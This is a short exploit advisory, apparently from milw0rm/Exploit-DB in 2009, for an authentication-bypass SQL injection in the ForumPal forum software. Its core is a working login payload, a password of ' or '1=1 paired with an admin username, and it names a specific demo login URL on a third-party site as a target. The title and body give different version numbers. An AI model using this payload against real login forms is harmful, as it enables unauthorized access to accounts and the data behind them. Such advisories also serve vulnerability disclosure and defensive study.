ForumPal FE 1.1 (Auth Bypass) Remote SQL Injection Vulnerability

# Title: ForumPal FE 1.1 (Auth Bypass) Remote SQL Injection Vulnerability
# EDB-ID: 9024
# CVE-ID: (2009-2366)
# OSVDB-ID: (55496)
# Author: ThE g0bL!N
# Published: 2009-06-26
# Verified: yes
# Download Exploit Code
# Download N/A

--------------------------------------------------------------
ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.datachecknh.com
Software :ForumPal v1.5
Note: Je m'appel Tecktonik
---------------------------------------------------------------
Exploit1:
-------
Username: [Real_name_admin]
Password:' or '1=1
----------------------------------------------------------------
Dem0
----
http://www.datachecknh.com/forumpal_FE_Demo/login.asp
EXPLOIT fOR DEMO
Username: admin
Password:' or '1=1
--------------------------------------
His0k4  - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r.
-----------------------------------------------------------------

# milw0rm.com [2009-06-26]